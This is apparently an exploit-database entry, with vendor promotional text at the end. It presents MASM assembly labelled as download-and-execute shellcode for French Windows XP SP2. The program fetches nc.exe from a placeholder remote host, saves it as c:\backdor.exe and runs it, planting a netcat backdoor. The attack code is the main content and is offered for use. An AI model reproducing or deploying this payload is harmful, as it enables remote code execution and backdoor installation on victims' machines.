===========================================
win32/xp sp2 Fr Download and Exec Shellcode
===========================================
Exploit Title winxp sp2 fr download & exec
code:
;-------------------------------------------
.586
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include shell32.inc
include urlmon.inc
includelib user32.lib
includelib kernel32.lib
includelib shell32.lib
includelib urlmon.lib
.data
URL db "http://www.site.com/nc.exe",0
PATH db "c:\backdor.exe",0
.data?
hResult dd ?
.code
; ---------------------------------------------------------------------------
start:
invoke URLDownloadToFile,0,addr URL,addr PATH,0,0
mov hResult,eax
.if eax!=1
invoke ShellExecute,0,0,addr PATH,0,0,SW_SHOW
.endif
end start
# 0day.today [2018-01-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation